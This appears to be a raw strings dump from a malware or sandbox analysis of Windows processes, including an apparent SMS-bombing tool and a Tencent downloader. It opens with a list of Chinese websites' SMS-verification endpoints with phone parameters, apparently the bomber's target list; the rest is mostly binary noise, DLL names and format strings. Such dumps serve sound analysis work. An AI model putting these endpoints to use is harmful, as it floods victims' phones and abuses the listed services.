SNDA_ADRefererSystem_ClientSign=BD69A9244616AAB258C27E9AF8C11B36; SNDA_ADRefererSystem_MachineTicket=a2b6c754-ff5b-4ac9-b226-9c47dceedf1e</pre><pre>GET /lars/check-account-types.jsonp?callback=jQuery16207765257628973603_1352982046643&userId=</pre><pre>http://www.haodou.com/user/register.php?do=checkphone&phone=</pre><pre>http://x5.51.com/register/index.php?a=send_sms&time=</pre><pre>&User_Password=19951221&User_RePassword=19951221&User_Sex=true&User_Age=5&User_Shen=28&User_Town=2&User_City=2</pre><pre>&_=1352983295921</pre><pre>http://gwpassport.woniu.com/v2/sendsms?jsoncallback=jQuery17205666854927724374_1352983199964&mobile=</pre><pre>&nickname=大厦大厦&password=1d88b2bc03e98603188da35275e88ac6&pd=30&om=0&verifycode=F6TDE&cache=1352983608812®from=</pre><pre>http://login.i.xunlei.com/register?jsoncallback=jsonp1352983484410&m=new&mail=</pre><pre>http://passport.szgla.com/Validate/UserName?q=2204.1553552751447</pre><pre>http://www.1732.com/public/ajax.aspx?app=sendcode&bindaccount=</pre><pre>http://agent.eju.com/register/sendmobilereg</pre><pre>http://www.17lu.cn/register.php?nowtime=1352984434062&verify=edf8826b</pre><pre>http://www.55188.com/smssend_ajax.php?f=3</pre><pre>http://passport.kongzhong.com/acc.do?m=sendPhoneVcodeFast&callback=jQuery1720998364229230869_1352987358344&phone=</pre><pre>http://www.maiduo.com/handler/Register/Register.ashx?act=check&mobile=</pre><pre>http://www.sinosig.com/auth/regist_resetMsg.action</pre><pre>http://fmail.21cn.com/freeinterface/jsp/reg/getSmsVilCode.jsp</pre><pre>http://fmail.21cn.com/message/sendSMS</pre><pre>http://user.huitongke.com/member!getVerificationCode.action?mobile=</pre><pre>http://passport.cntv.cn/mobileRegister.do</pre><pre>&_=1353664161421</pre><pre>http://www.aapinche.cn/ajax/mobile_code.ashx?do=get&mobile=</pre><pre>http://m.jxedt.com/about/sendmsgtomobile.asp</pre><pre>type=wapurl&mobile=</pre><pre>&submit=È·¶¨</pre><pre>type=iphoneurl&mobile=</pre><pre>type=androidurl&mobile=</pre><pre>http://a3.act.jj.cn/www/get_sms_code.php?callback=jsonp1353664437829&_=1353664492296&mobile=</pre><pre>http://bbs.fobshanghai.com/ajax.php?inajax=1&action=checkmobile&mobile=</pre><pre>http://www.paixie.net/member/verify_phone_async.php?type=sendcode&phone=</pre><pre>HTTP/1.1 200 OKDate: Fri, 23 Nov 2012 10:15:51 GMTServer: Apache CoyoteSet-Cookie: OZ_0Y_1701=1701&A_aHR0cDovL3d3dy5wYWl4aWUubmV0Lz9fc3ZfY29kZT00MDNfNDgwMDY4OF8xNzY2NDU0Mjc=&1353665665&-&1353665751&1&732033; path=/; domain=.oadz.comP3P: CP=NOI DSP LAW NID IVAa OUR STP UNICache-Control: no-cacheContent-Length: 43Keep-Alive: timeout=15, max=200Connection: Keep-AliveContent-Type: image/gifGIF89a</pre><pre>http://www.qgyyzs.net/business/checkregAjax.asp?menu=CheckRegSj&sj=</pre><pre>HTTP/1.1 200 OKDate: Fri, 23 Nov 2012 10:38:57 GMTServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETContent-Length: 36Content-Type: text/html; Charset=gb2312Cache-control: private</pre><pre>http://auth.shequ.10086.cn/ajax/info.php?act=send_code</pre><pre>http://my.xizi.com/index.php?r=members/sendverify</pre><pre>http://www.taoxie.com/registerok.aspx?action=ajaxsendcode&mobile=</pre><pre>&verifyCode=&rand=56537441567125520&admin_uin=9176788&client_uin=&clientid=&visitor_comes=1&visitor_page=http://www.shgongshang.com/&visitor_last_page=&visitor_keyword=&visitor_entry=&cause=0</pre><pre>http://vip.tq.cn/vip/SendShortCall.do?uin=9186861&callPhone=</pre><pre>&verifyCode=&rand=52298377998835271&admin_uin=8429994&client_uin=&clientid=&visitor_comes=1&visitor_page=http://www.cppinfo.com/&visitor_last_page=&visitor_keyword=&visitor_entry=&cause=0</pre><pre>http://vip.tq.cn/vip/SendShortCall.do?uin=8429994&callPhone=</pre><pre>http://bbs.cnool.net/tools/getsms.aspx</pre><pre>09/27/12</pre><pre>Y]Key</pre><pre>http://sighttp.qq.com/msgrd?v=3&uin=885229130&site=qq&menu=yes</pre><pre>http://jifen.2345.com/wo/zhanghao.php</pre><pre>2OJ%U$</pre><pre>yo.zP&%</pre><pre>1.yZN</pre><pre>IEC http://www.iec.ch</pre><pre>.IEC 61966-2.1 Default RGB colour space - sRGB</pre><pre>CRT curv</pre><pre>urlTEXT</pre><pre>MsgeTEXT</pre><pre>Adobe Photoshop CS2 Windows</pre><pre>2008:06:29 22:36:52</pre><pre>G.wlUj^,</pre><pre>ÎbBP</pre><pre>63.cP</pre><pre>se%S<4</pre><pre>6.Wq\</pre><pre>=U%xJ</pre><pre> KF%s</pre><pre>1i.gN8</pre><pre>RU)%SV</pre><pre>J]=.eg</pre><pre>mSGF</pre><pre>Pv(.Vz</pre><pre>N.NEve</pre><pre>DUSv%UNV,</pre><pre>N).fv</pre><pre>6.SKn</pre><pre>-se.GTJ</pre><pre>3551177</pre><pre>www.52pojie.cn</pre><pre>HTTP/1.1 200 OKDate: Fri, 23 Nov 2012 11:47:11 GMTServer: Apache CoyoteSet-Cookie: OZ_0Y_1701=1701&A_aHR0cDovL3d3dy5wYWl4aWUubmV0Lz9fc3ZfY29kZT00MDNfNDgwMDY4OF8xNzY2NDU0Mjc=&1353671204&-&1353671231&0&428186; path=/; domain=.oadz.comP3P: CP=NOI DSP LAW NID IVAa OUR STP UNICache-Control: no-cacheContent-Length: 43Keep-Alive: timeout=15, max=199Connection: Keep-AliveContent-Type: image/gifGIF89a</pre><pre>2@{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}</pre><pre>yoSSSSh$J</pre><pre>www.shzly.in</pre><pre>885229130</pre><pre>F%*.*f</pre><pre>CNotSupportedException</pre><pre>commctrl_DragListMsg</pre><pre>Afx:%x:%x:%x:%x:%x</pre><pre>Afx:%x:%x</pre><pre>COMCTL32.DLL</pre><pre>CCmdTarget</pre><pre>__MSVCRT_HEAP_SELECT</pre><pre>SHLWAPI.dll</pre><pre>MPR.dll</pre><pre>VERSION.dll</pre><pre>p%U?c</pre><pre>WSOCK32.dll</pre><pre>.PAVCException@@</pre><pre>.PAVCNotSupportedException@@</pre><pre>.PAVCFileException@@</pre><pre>(*.prn)|*.prn|</pre><pre>(*.*)|*.*||</pre><pre>Shell32.dll</pre><pre>Mpr.dll</pre><pre>Advapi32.dll</pre><pre>(&07-034/)7 '</pre><pre>?? / %d]</pre><pre>%d / %d]</pre><pre>: %d]</pre><pre>(*.WAV;*.MID)|*.WAV;*.MID|WAV</pre><pre>(*.WAV)|*.WAV|MIDI</pre><pre>(*.MID)|*.MID|</pre><pre>(*.txt)|*.txt|</pre><pre>(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG</pre><pre>(*.JPG)|*.JPG|BMP</pre><pre>(*.BMP)|*.BMP|GIF</pre><pre>(*.GIF)|*.GIF|</pre><pre>(*.ICO)|*.ICO|</pre><pre>(*.CUR)|*.CUR|</pre><pre>%s:%d</pre><pre>windows</pre><pre>out.prn</pre><pre>%d.%d</pre><pre>%d / %d</pre><pre>%d/%d</pre><pre>Bogus message code %d</pre><pre>(%d-%d):</pre><pre>%ld%c</pre><pre>www.dywt.com.cn</pre><pre>x86 Family %s Model %s Stepping %s</pre><pre>X-X-X-X</pre><pre>X-X-X-X-X-X</pre><pre>1.1.3</pre><pre>;3 #>6.&</pre><pre>'2, / 0&7!4-)1#</pre><pre>HTTP/1.0</pre><pre>%s <%s></pre><pre>Reply-To: %s</pre><pre>From: %s</pre><pre>To: %s</pre><pre>Subject: %s</pre><pre>Date: %s</pre><pre>Cc: %s</pre><pre>%a, %d %b %Y %H:%M:%S</pre><pre>SMTP</pre><pre>%d%d%d</pre><pre>rundll32.exe shell32.dll,</pre><pre>.PAVCObject@@</pre><pre>.PAVCSimpleException@@</pre><pre>.PAVCMemoryException@@</pre><pre>.?AVCNotSupportedException@@</pre><pre>.PAVCResourceException@@</pre><pre>.PAVCUserException@@</pre><pre>.?AVCCmdTarget@@</pre><pre>.?AVCCmdUI@@</pre><pre>.?AVCTestCmdUI@@</pre><pre>.PAVCArchiveException@@</pre><pre>zcÁ</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\</pre><pre>2.Lsm</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not loaded</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>operator</pre><pre>activation.php?code=</pre><pre>deactivation.php?hash=</pre><pre>.?AVIUrlBuilderSource@@</pre><pre>.AnRH</pre><pre>.MCa:</pre><pre>T!n%d</pre><pre>1fÄ</pre><pre>$z%D?</pre><pre>\c%C|</pre><pre>À=p</pre><pre>%C$8O</pre><pre>tm.Uf</pre><pre>.iZPa</pre><pre>.sWu&6i*</pre><pre>4.LwE</pre><pre>e.KiV%</pre><pre>h7.Lc</pre><pre>^|#%C</pre><pre>%ChO4s1'TdR></pre><pre>*Hc%Cl</pre><pre>Zx7EzR%X</pre><pre>w0e.edZZ</pre><pre>}f}U</pre><pre>6qp7%f</pre><pre>i].Kd</pre><pre>.IRp/-K</pre><pre>XcYfV%7x</pre><pre>À,c</pre><pre>%C$O`i</pre><pre>`.Lsx</pre><pre>]>.MN</pre><pre>cLj%C</pre><pre>~U`/]>.av</pre><pre>t/]vF}</pre><pre>3:4R%Sq</pre><pre>.Ca6&E(</pre><pre>n=.LgmR</pre><pre>Sq.Ge>N-(F</pre><pre>hcRT</pre><pre>A%CxS</pre><pre>.LwL.</pre><pre>cc.fW;</pre><pre>FÀ,g</pre><pre>T7%F->R</pre><pre>%FPn9</pre><pre>%C u^</pre><pre>4.LcY</pre><pre>.Pq{N</pre><pre>.Ca6&</pre><pre>%C$I-</pre><pre>^|W%F</pre><pre>.MkT'E&M^r</pre><pre> %Ch<</pre><pre>AÄW</pre><pre>d}.Of</pre><pre>\A%C|O</pre><pre> %C$8</pre><pre>A_tHc%C C</pre><pre>AÀ,</pre><pre>I.aPX</pre><pre>(].wL</pre><pre>].LwE</pre><pre>yV%C '</pre><pre>%f/xyV</pre><pre>.YL A&6Q</pre><pre><%Chi</pre><pre>/`U&M^%C$</pre><pre>.MNl3</pre><pre>aJBm_dX Ajb%7x</pre><pre>Uh<y%d><pre>Wu:R}</pre><pre>G.aTo</pre><pre>h'%Cl_}"</pre><pre>6o<%Cx</pre><pre>%C|P3)JQ</pre><pre>ðN)R</pre><pre>t a:R}</pre><pre>IW%Cl`;</pre><pre>À&D</pre><pre>f!.LwD</pre><pre>Xh&& %f</pre><pre>.IUs8</pre><pre>Sq.Ge</pre><pre>|/DXPK%u</pre><pre>.Mk0{</pre><pre>y:%C$7</pre><pre>kQ;5dHf}<</pre><pre>J.LwE"#Az~</pre><pre>%C$P5f</pre><pre>9rDb%F</pre><pre>.Ge*b]@</pre><pre>SxT7þcXE</pre><pre>%Ch8V</pre><pre>?|u.oJ</pre><pre>j@V:Xc%Cx=</pre><pre>WO %S</pre><pre>q.uf}</pre><pre>|G.Lc</pre><pre>XÄ(o</pre><pre>Wu.oM</pre><pre>W%Src</pre><pre>.Lw]B5.</pre><pre>W%Chc</pre><pre>u.eri[</pre><pre>%f/|u</pre><pre>B`7%FO(</pre><pre>.YL/v!t7^</pre><pre>SHELL32.dll</pre><pre>WINMM.dll</pre><pre>.cIrb</pre><pre>_`.ub</pre><pre>b:\0,</pre><pre>.LRC\</pre><pre>.CXbt\Y</pre><pre>.qnaS></pre><pre>^`g%FP</pre><pre>w.Nj\</pre><pre>JUdPa</pre><pre>V$F%x</pre><pre>;%DO\</pre><pre>\z.ay</pre><pre>wg.tq</pre><pre>\i-L}</pre><pre>|B\%f</pre><pre>.Qh\S</pre><pre>.AsD<</pre><pre>)\l.zc</pre><pre>F:\BQw</pre><pre>C\ .lE</pre><pre>cm.Ng\</pre><pre>%F:Y\Q</pre><pre>'\.mtl</pre><pre>{\.Bf</pre><pre>a.CiN</pre><pre>(.oTv</pre><pre>Q:P\.eC7</pre><pre>.vc3S</pre><pre>CmDk</pre><pre>.tjuN"\</pre><pre>.XQ\x</pre><pre>.kN)C$8_<</pre><pre>%C$8_</pre><pre>e>oole32.dll</pre><pre>g %Ch</pre><pre>%f{T(</pre><pre>WININET.dll</pre><pre>KERNEL32.dll</pre><pre>.aoT3</pre><pre>%F'Y<</pre><pre>*t%C$I</pre><pre>g.ePkr9</pre><pre>%f{<i6><pre>t_-N×</pre><pre>WINSPOOL.DRV</pre><pre>@3}.Lg0</pre><pre>K!f%C|Om</pre><pre>comdlg32.dll</pre><pre>.IFk,k</pre><pre>p%f{ \;HYwL</pre><pre>RASAPI32.dll</pre><pre>%CxT7%</pre><pre>SD.GH</pre><pre>\a.wT</pre><pre>.xCa\</pre><pre>_r%Uy</pre><pre>9p</pre><pre>\f7q$ %sJaz;m0</pre><pre>zX.qa</pre><pre>a.YfJuSL</pre><pre>Z,.YXz=a</pre><pre>8.BBi\</pre><pre>p%s.a</pre><pre>%u$<n><pre>%uhOK</pre><pre>.UPAXM</pre><pre>~#]|%X</pre><pre>-<O%c><pre>y4\p%s"</pre><pre>.RlJSp</pre><pre>!Xl%s*</pre><pre> .VnZ</pre><pre>%s2ba</pre><pre>Jc\>%d</pre><pre>s%.mm</pre><pre>%F"_T</pre><pre>.XugE</pre><pre>^z }|x%SnS;p</pre><pre>\.Al(]</pre><pre>%CsH]^</pre><pre>3.pu*</pre><pre>#].as</pre><pre>;.WMx</pre><pre>.dMs4</pre><pre>.CG}B`</pre><pre>%s&l}L</pre><pre>M.Id)</pre><pre>TUm%f</pre><pre>s:\-B</pre><pre>FR"\.Ap</pre><pre>D;%sb</pre><pre>D/%Xk</pre><pre>p%s^2u.i</pre><pre>W\.Xe</pre><pre>%d`U?</pre><pre>k.MF _A</pre><pre>.kOW\</pre><pre>|%s*/</pre><pre>'q.zQ</pre><pre>y.RO0</pre><pre>:^.gNk*T</pre><pre>#%f&;!</pre><pre>%4U#o<\k^</pre><pre>.Xe\ Ud</pre><pre>ö<}</pre><pre>S1.Dh</pre><pre>V.wu#</pre><pre>(.aS[i</pre><pre>.hv8w</pre><pre>.xgPD</pre><pre>.Uut [</pre><pre>c:\Ed</pre><pre><a%2><pre>%uP{\Y<</pre><pre>N%S Pa)$</pre><pre>o%D:&\</pre><pre>.HefG</pre><pre>-G2}gfd</pre><pre>-6}_$C,D</pre><pre>\%xSj</pre><pre>.gU\!</pre><pre>X.SIct</pre><pre>deX.do</pre><pre>*'c%D</pre><pre>S.Fx<</pre><pre>G:\1@</pre><pre>X-%f#6</pre><pre>OLEAUT32.dll</pre><pre>ADVAPI32.dll</pre><pre>U6%C$8</pre><pre>l$B%f</pre><pre>%f{T(w</pre><pre>Wu.Ge</pre><pre>{[.nv</pre><pre>>E6%CxT</pre><pre>L{>%X</pre><pre>z;h7.hxn</pre><pre>X)%C_</pre><pre>R].MP</pre><pre>,/%DV4</pre><pre>^.DTV[</pre><pre>%C#`;</pre><pre>F^>.xLng</pre><pre>%c`T80</pre><pre>r%u=EB;'</pre><pre>|.Imy</pre><pre>^@%xS</pre><pre>%fy6j</pre><pre>H.ST?f^@</pre><pre>.GwYo!</pre><pre>]w.iG</pre><pre>;.aVR</pre><pre>jD..tb</pre><pre>zY.vh</pre><pre>.yv}{"</pre><pre>RegOpenKeyExA</pre><pre>^|W6%xk</pre><pre>wiphlpapi.dll</pre><pre>WS2_32.dll</pre><pre>LsI.Or</pre><pre>@a%dG</pre><pre>zD.BOO</pre><pre>.yxW%v</pre><pre>Sq6%C</pre><pre>1, 0, 6, 6</pre><pre>-Skin.dll</pre><pre>mscoree.dll</pre><pre>Error at initialization of bundled DLL: %s</pre><pre>Error at hooking API "%S"</pre><pre>Dumping first %d bytes:</pre><pre>1.3.2012.11</pre><b>ÊÖ»úºäÕ¨»ú.exe_652_rwx_005E5000_000EC000:</b><pre>2.Lsm</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not loaded</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>operator</pre><pre>activation.php?code=</pre><pre>deactivation.php?hash=</pre><pre>.?AVIUrlBuilderSource@@</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\</pre><pre>.AnRH</pre><pre>.MCa:</pre><pre>T!n%d</pre><pre>1fÄ</pre><pre>$z%D?</pre><pre>\c%C|</pre><pre>À=p</pre><pre>%C$8O</pre><pre>tm.Uf</pre><pre>.iZPa</pre><pre>.sWu&6i*</pre><pre>4.LwE</pre><pre>e.KiV%</pre><pre>h7.Lc</pre><pre>^|#%C</pre><pre>%ChO4s1'TdR></pre><pre>*Hc%Cl</pre><pre>Zx7EzR%X</pre><pre>w0e.edZZ</pre><pre>}f}U</pre><pre>6qp7%f</pre><pre>i].Kd</pre><pre>.IRp/-K</pre><pre>XcYfV%7x</pre><pre>À,c</pre><pre>%C$O`i</pre><pre>`.Lsx</pre><pre>]>.MN</pre><pre>cLj%C</pre><pre>~U`/]>.av</pre><pre>t/]vF}</pre><pre>3:4R%Sq</pre><pre>.Ca6&E(</pre><pre>n=.LgmR</pre><pre>Sq.Ge>N-(F</pre><pre>hcRT</pre><pre>A%CxS</pre><pre>.LwL.</pre><pre>cc.fW;</pre><pre>FÀ,g</pre><pre>T7%F->R</pre><pre>%FPn9</pre><pre>%C u^</pre><pre>4.LcY</pre><pre>.Pq{N</pre><pre>.Ca6&</pre><pre>%C$I-</pre><pre>^|W%F</pre><pre>.MkT'E&M^r</pre><pre> %Ch<</pre><pre>AÄW</pre><pre>d}.Of</pre><pre>\A%C|O</pre><pre> %C$8</pre><pre>A_tHc%C C</pre><pre>AÀ,</pre><pre>I.aPX</pre><pre>(].wL</pre><pre>].LwE</pre><pre>yV%C '</pre><pre>%f/xyV</pre><pre>.YL A&6Q</pre><pre><%Chi</pre><pre>/`U&M^%C$</pre><pre>.MNl3</pre><pre>aJBm_dX Ajb%7x</pre><pre>Uh<y%d><pre>Wu:R}</pre><pre>G.aTo</pre><pre>h'%Cl_}"</pre><pre>6o<%Cx</pre><pre>%C|P3)JQ</pre><pre>ðN)R</pre><pre>t a:R}</pre><pre>IW%Cl`;</pre><pre>À&D</pre><pre>f!.LwD</pre><pre>Xh&& %f</pre><pre>.IUs8</pre><pre>Sq.Ge</pre><pre>|/DXPK%u</pre><pre>.Mk0{</pre><pre>y:%C$7</pre><pre>kQ;5dHf}<</pre><pre>J.LwE"#Az~</pre><pre>%C$P5f</pre><pre>9rDb%F</pre><pre>.Ge*b]@</pre><pre>SxT7þcXE</pre><pre>%Ch8V</pre><pre>?|u.oJ</pre><pre>j@V:Xc%Cx=</pre><pre>WO %S</pre><pre>q.uf}</pre><pre>|G.Lc</pre><pre>XÄ(o</pre><pre>Wu.oM</pre><pre>W%Src</pre><pre>.Lw]B5.</pre><pre>W%Chc</pre><pre>KERNEL32.DLL</pre><pre>mscoree.dll</pre><pre>Error at initialization of bundled DLL: %s</pre><pre>Error at hooking API "%S"</pre><pre>Dumping first %d bytes:</pre><b>ÊÖ»úºäÕ¨»ú.exe_652_rwx_00738000_00001000:</b><pre>%F'Y<</pre><pre>*t%C$I</pre><pre>g.ePkr9</pre><b>tencentdl.exe_1932:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>8%uvP</pre><pre>;*u.SUj</pre><pre>PSSSSSSh</pre><pre>>.uTV</pre><pre>j SSSSSSSh</pre><pre>aSSSh</pre><pre>FTPjK</pre><pre>FtPj;</pre><pre>C.PjRV</pre><pre>tGHt.Ht&</pre><pre>YYtCP</pre><pre>t.hXOK</pre><pre>asio.ssl</pre><pre>asio.misc</pre><pre>D:\Boost\boost_1_44_0\include\boost-1_44\boost/exception/detail/exception_ptr.hpp</pre><pre>asio.misc error</pre><pre>asio.ssl error</pre><pre>fs_report.qq.com</pre><pre>fs_h2u.qq.com</pre><pre>fs_conn.qq.com</pre><pre>fs_hello.qq.com</pre><pre>xuanfengnet.qq.com</pre><pre>stun.qq.com</pre><pre>fs_tcp_conn.qq.com</pre><pre>pdlxf.qq.com</pre><pre>thread.exit_event</pre><pre>thread.entry_event</pre><pre>%s\Connection</pre><pre>System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}</pre><pre>www.tencent.com.</pre><pre>HTTP/1.1</pre><pre>$MD5Version: 1.0.0 November-19-1997 $</pre><pre>$Id: md5.c,v 1.1.1.1 2004/05/17 13:23:36 rcrittenden0569 Exp $</pre><pre>/tencentdlinstallinfo/dtrp?v=1&&format=json&&product=tencentdlinstallinfo&&cmd=1</pre><pre>dtrp.tencentdlinstallinfo.qq.com</pre><pre></pre><pre><!--%s--></pre><pre>standalone="%s"</pre><pre>encoding="%s"</pre><pre>version="%s"</pre><pre>&#xX;</pre><pre>%s='%s'</pre><pre>%s="%s"</pre><pre>PKEY_CUSTOMNAME</pre><pre>PKEY_PRODUCTNAME</pre><pre>PKEY_ISSHOW</pre><pre>PKEY_EXITTIME</pre><pre>PKEY_CUSTOMID</pre><pre>PKEY_START_STATUS</pre><pre>PKEY_GUID</pre><pre>PKEY_MINORVERSION</pre><pre>PKEY_MAJORVERSION</pre><pre>PKEY_COREVERSION</pre><pre>PKEY_EXEVERSION</pre><pre>PKEY_UPDATESERVERPORT</pre><pre>PKEY_UPDATESERVERIP</pre><pre>PKEY_EXHASH</pre><pre>PKEY_EXNAME</pre><pre>PKEY_TNHASH</pre><pre>PKEY_TNNAME</pre><pre>PKEY_COREHASH</pre><pre>PKEY_CORENAME</pre><pre>PKEY_EXEHASH</pre><pre>PKEY_EXENAME</pre><pre>PKEY_UPDATEURL</pre><pre>PKEY_FILENAME</pre><pre>PKEY_RESULT</pre><pre>xf_com_update_doctor.qq.com</pre><pre>PKEY_TTL</pre><pre>PKEY_ISFIX</pre><pre>PKEY_VERSION</pre><pre>PKEY_FILEEMULE_HASH</pre><pre>PKEY_FILEEMULE_SIZE</pre><pre>PKEY_FILEEMULE_NAME</pre><pre>PKEY_FILEBT_HASH</pre><pre>PKEY_FILEBT_SIZE</pre><pre>PKEY_FILEBT_NAME</pre><pre>PKEY_FILECORE_HASH</pre><pre>PKEY_FILECORE_SIZE</pre><pre>PKEY_FILECORE_NAME</pre><pre>PKEY_URL</pre><pre>PKEY_PERIOD</pre><pre>kernel32.dll</pre><pre>.mixcrt</pre><pre>KERNEL32.DLL</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not loaded</pre><pre>mscoree.dll</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>operator</pre><pre>portuguese-brazilian</pre><pre>FhModule = %u, pfunc = %u</pre><pre>DbgHelp.dll</pre><pre>crash.dmp</pre><pre>0xX</pre><pre>DlBugReport.ini</pre><pre>DlBugReport.dat</pre><pre>%Y-%m-%d %H:%M:%S</pre><pre>%d.%d.%d.%d</pre><pre>,d-d-d d:d:d</pre><pre>[ 0xX ] %s [%s]</pre><pre>Error: Write address 0xX</pre><pre>Error: Read address 0xX</pre><pre>version = %s</pre><pre>%s-----------------------------------</pre><pre>Type: %s</pre><pre>Address: 0xX</pre><pre>QQDownload.exe</pre><pre>EXCEPTION_FLT_INVALID_OPERATION</pre><pre>EXCEPTION_FLT_DENORMAL_OPERAND</pre><pre>(%d,%d,%d,%d)</pre><pre>0xX<unknown module>:</unknown></pre><pre>%s::x;</pre><pre>0xX[%X] %s:</pre><pre>%s::x</pre><pre>Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag</pre><pre>Visual C CRT: Not enough memory to complete call to strerror.</pre><pre>Broken pipe</pre><pre>Inappropriate I/O control operation</pre><pre>Operation not permitted</pre><pre>c:\downloadplugin\tencentdl_v122\output\release\Tencentdl.pdb</pre><pre>HttpQueryInfoW</pre><pre>HttpEndRequestW</pre><pre>HttpSendRequestExW</pre><pre>HttpAddRequestHeadersW</pre><pre>HttpOpenRequestW</pre><pre>WININET.dll</pre><pre>GetProcessHeap</pre><pre>CreateIoCompletionPort</pre><pre>GetCPInfo</pre><pre>GetConsoleOutputCP</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>RegDeleteKeyW</pre><pre>RegCloseKey</pre><pre>RegCreateKeyExW</pre><pre>RegOpenKeyExW</pre><pre>RegQueryInfoKeyW</pre><pre>RegEnumKeyExW</pre><pre>RegOpenKeyW</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteW</pre><pre>SHELL32.dll</pre><pre>ole32.dll</pre><pre>OLEAUT32.dll</pre><pre>SHLWAPI.dll</pre><pre>COMCTL32.dll</pre><pre>WS2_32.dll</pre><pre>VERSION.dll</pre><pre>NetWkstaTransportEnum</pre><pre>NETAPI32.dll</pre><pre>PSAPI.DLL</pre><pre>imagehlp.dll</pre><pre>zcÁ</pre><pre>'DownloadProxy.EXE'</pre><pre>DownloadProxy.Downloader.1 = s 'Downloader Class'</pre><pre>CLSID = s '{70DE12EA-79F4-46bc-9812-86DB50A2FD64}'</pre><pre>DownloadProxy.Downloader = s 'Downloader Class'</pre><pre>CurVer = s 'DownloadProxy.Downloader.1'</pre><pre>ForceRemove {70DE12EA-79F4-46bc-9812-86DB50A2FD64} = s 'Downloader Class'</pre><pre>ProgID = s 'DownloadProxy.Downloader.1'</pre><pre>VersionIndependentProgID = s 'DownloadProxy.Downloader'</pre><pre>'TypeLib' = s '{DA624F8F-98BF-4B03-AD11-A12D07119E81}'</pre><pre>stdole2.tlbWWW</pre><pre>cuiMsgTypeWWW</pre><pre>pMsgParamWWWd</pre><pre>6|pTaskUrl</pre><pre>Created by MIDL version 6.00.0366 at Thu Oct 11 11:26:38 2012</pre><pre>&UU*&&&&&&&&*UU(%%%%%%%%(UU)%%%%%%%%)UU.$$$$$$$$.UU1''''''''1UU</pre><pre>"7,,11,,7"</pre><pre>2222222222222222</pre><pre>11///20.</pre><pre>##!!! !!!##</pre><pre>.02///11</pre><pre>mM............................................................Mm</pre><pre>mM..........................................Mm</pre><pre>(((((((JgT..TgJ(((((((</pre><pre>$D>".PH'8xU</pre><pre><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></pre><pre>HKEY_CLASSES_ROOT</pre><pre>HKEY_CURRENT_USER</pre><pre>HKEY_LOCAL_MACHINE</pre><pre>HKEY_USERS</pre><pre>HKEY_PERFORMANCE_DATA</pre><pre>HKEY_DYN_DATA</pre><pre>HKEY_CURRENT_CONFIG</pre><pre>TNProxy.dll</pre><pre>qqdownload_config.xml</pre><pre>dlcore.dll</pre><pre>\tencentdl.exe</pre><pre>{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}</pre><pre>CLSID\%s\LocalServer32</pre><pre>{%X-%X-%X-%X-%X%X}</pre><pre>B.tlb</pre><pre>Mscoree.dll</pre><pre>DownloadProxy.Downloader.1</pre><pre>\Tencentdl.exe</pre><pre>\Installlog.txt</pre><pre>\DownloadProxyPS.dll</pre><pre>\extract.dll</pre><pre>\tnproxy.dll</pre><pre>\dlcore.dll</pre><pre>regsvr32.exe</pre><pre>Kernel32.dll</pre><pre>Extract.dll</pre><pre>C\StringFileInfo\xx\</pre><pre>netsh.exe</pre><pre>\\.\PhysicalDrive%d</pre><pre>\\.\Scsi%d:</pre><pre>oiphlpapi.dll</pre><pre>nM-%.2d-%.2d %.2d:%.2d:%.2d</pre><pre>Unknown ProcessID. PID = %d</pre><pre>No pid option found in CmdLine</pre><pre>Content-Length: %d</pre><pre>Content-Type: application/x-www-form-urlencoded</pre><pre>\downloadproxyps.dll</pre><pre>oInstallInfo.xml</pre><pre>\Global.db</pre><pre>PQD_Temp_Exe</pre><pre>%*.*f</pre><pre>Tencentdl.exe</pre><pre>: %s/s</pre><pre>%s: %s</pre><pre>\TDConfig.ini</pre><pre>H\set.log</pre><pre>c:\program files\common files\tencent\qqdownload\122\tencentdl.exe</pre><pre>(1-10240)</pre><pre>1, 0, 122, 3</pre><b>ÊÖ»úºäÕ¨»ú.exe_652_rwx_10028000_00015000:</b><pre>msctls_hotkey32</pre><pre>TVCLHotKey</pre><pre>THotKey</pre><pre>\skinh.she</pre><pre>}uo,x6l5k%x-l h</pre><pre>9p%s m)t4`#b</pre><pre>e"m?c&y1`Ð<</pre><pre>SetViewportOrgEx</pre><pre>SetViewportExtEx</pre><pre>SetWindowsHookExA</pre><pre>UnhookWindowsHookEx</pre><pre>EnumThreadWindows</pre><pre>EnumChildWindows</pre><pre>`c%US.4/</pre><pre>!#$<#$#=</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>@.UPX0</pre><pre>`.UPX1</pre><pre>`.reloc</pre><pre>hJK.ZH</pre><pre>O.qt0</pre><b>KNBCenter.exe_1240:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>D$@j.Xf</pre><pre>j.Yf;</pre><pre>_tcPVj@</pre><pre>.PjRW</pre><pre>user.js</pre><pre>ERROR_REPORT</pre><pre>PlatformFile.UnknownErrors.Windows</pre><pre>Histogram: %s recorded %d samples</pre><pre>(flags = 0x%x)</pre><pre>(%d = 